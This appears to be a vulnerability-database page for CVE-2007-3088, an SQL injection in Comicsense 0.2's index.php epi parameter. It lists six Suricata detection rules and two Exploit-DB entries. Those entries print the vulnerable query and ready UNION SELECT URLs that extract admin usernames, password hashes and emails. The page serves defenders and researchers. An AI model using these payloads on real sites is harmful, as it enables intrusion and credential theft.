CVE-2007-3088
published 2007-06-06CVE-2007-3088: SQL injection vulnerability in index.php in Comicsense allows remote attackers to execute arbitrary SQL commands via the epi parameter.
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.17%
63.4th percentile
SQL injection vulnerability in index.php in Comicsense allows remote attackers to execute arbitrary SQL commands via the epi parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2007-3088 [HIGH] ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi ASCII
ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi ASCII"; flow:established,to_server; http.uri; content:"/index.php?"; nocase; content:"epi="; nocase; fast_pattern; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-3088; reference:url,www.securityfocus.com/archive/1/archive/1/470598/100/0/threaded; classtype:web-application-attack; sid:2004639; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_n
Suricata
ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2007-3088 [HIGH] ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi DELETE
ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi DELETE"; flow:established,to_server; http.uri; content:"/index.php?"; nocase; content:"epi="; nocase; fast_pattern; content:"DELETE"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-3088; reference:url,www.securityfocus.com/archive/1/archive/1/470598/100/0/threaded; classtype:web-application-attack; sid:2004638; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_n
Suricata
ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-3088 [HIGH] ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi SELECT
ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi SELECT"; flow:established,to_server; http.uri; content:"/index.php?"; nocase; content:"epi="; nocase; fast_pattern; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-3088; reference:url,www.securityfocus.com/archive/1/archive/1/470598/100/0/threaded; classtype:web-application-attack; sid:2004635; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_03, mitre_tactic_id TA0001, mitre_tactic_n
Suricata
ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi UNION SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-3088 [HIGH] ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi UNION SELECT
ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi UNION SELECT"; flow:established,to_server; http.uri; content:"/index.php?"; nocase; content:"epi="; nocase; fast_pattern; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-3088; reference:url,www.securityfocus.com/archive/1/archive/1/470598/100/0/threaded; classtype:web-application-attack; sid:2004636; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, m
Suricata
ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2007-3088 [HIGH] ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi INSERT
ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi INSERT"; flow:established,to_server; http.uri; content:"/index.php?"; nocase; content:"epi="; nocase; fast_pattern; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2007-3088; reference:url,www.securityfocus.com/archive/1/archive/1/470598/100/0/threaded; classtype:web-application-attack; sid:2004637; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_n
Suricata
ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2007-3088 [HIGH] ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi UPDATE
ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Comicsense SQL Injection Attempt -- index.php epi UPDATE"; flow:established,to_server; http.uri; content:"/index.php?"; nocase; content:"epi="; nocase; fast_pattern; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2007-3088; reference:url,www.securityfocus.com/archive/1/archive/1/470598/100/0/threaded; classtype:web-application-attack; sid:2004640; rev:10; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_10, mitre_tactic_id TA0001, mitre_tactic_n
Exploit-DB
Comicsense 0.2 - 'index.php?epi' SQL Injection (2)
exploitdb·2007-06-06
CVE-2007-3088 Comicsense 0.2 - 'index.php?epi' SQL Injection (2)
Comicsense 0.2 - 'index.php?epi' SQL Injection (2)
---
#!/usr/bin/perl -w
#################################################################################
# #
# ComicSense 0.2 SQL Injection Exploit #
# #
# Discovered by: s0cratex #
# Payload: Admin Username & Hash Retrieval #
# Website: http://www.w4ck1ng.com #
# #
# Original Advisory: http://seclists.org/bugtraq/2007/Jun/0063.html #
# http://milw0rm.com/exploits/4035 #
# #
# Vulnerable Code (index.php): #
# #
# $sqlQuery = "SELECT * FROM " . $prefix . "comic WHERE episodenr = $epi"; #
# #
# PoC: http://victim.com/index.php?epi=-999 UNION SELECT username,0,password #
# FROM users LIMIT 1 #
# #
# Subject To: Nothing #
# GoogleDork: Get your own! #
# #
# Shoutz: The entire w4ck1ng community & s0cratex #
# #
##############################
Exploit-DB
Comicsense 0.2 - 'index.php?epi' SQL Injection (1)
exploitdb·2007-06-05
CVE-2007-3088 Comicsense 0.2 - 'index.php?epi' SQL Injection (1)
Comicsense 0.2 - 'index.php?epi' SQL Injection (1)
---
Comicsense SQL Injection Advisory/Exploit
by s0cratex
[email protected]
http://plexinium.net
-
ComicSense is a script using php / mySQL.
It allows you to easily host an Online Comic
or Image shack.
You can download it from www.gayadesign.nl/comicsense/
-
The bug is a common sql injection in "index.php"
Line 32:
$sqlQuery = "SELECT * FROM " . $prefix . "comic WHERE episodenr = $epi";
And the variable $epi is not verified...
Exploit:
Admin username
http://site.com/comic_paht/index.php?epi=-1 UNION SELECT username,1,1 FROM users
MD5 hash password:
http://site.com/comic_paht/index.php?epi=-1 UNION SELECT password,1,1 FROM users
e-Mail adress:
http://site.com/comic_paht/index.php?epi=-1 UNION SELECT email,1,1 from users
# milw0
No writeups or analysis indexed.
http://osvdb.org/38370http://securityreason.com/securityalert/2778http://www.securityfocus.com/archive/1/470598/100/0/threadedhttp://www.securityfocus.com/bid/24329http://www.vupen.com/english/advisories/2007/2092https://exchange.xforce.ibmcloud.com/vulnerabilities/34736http://osvdb.org/38370http://securityreason.com/securityalert/2778http://www.securityfocus.com/archive/1/470598/100/0/threadedhttp://www.securityfocus.com/bid/24329http://www.vupen.com/english/advisories/2007/2092https://exchange.xforce.ibmcloud.com/vulnerabilities/34736
2007-06-06
Published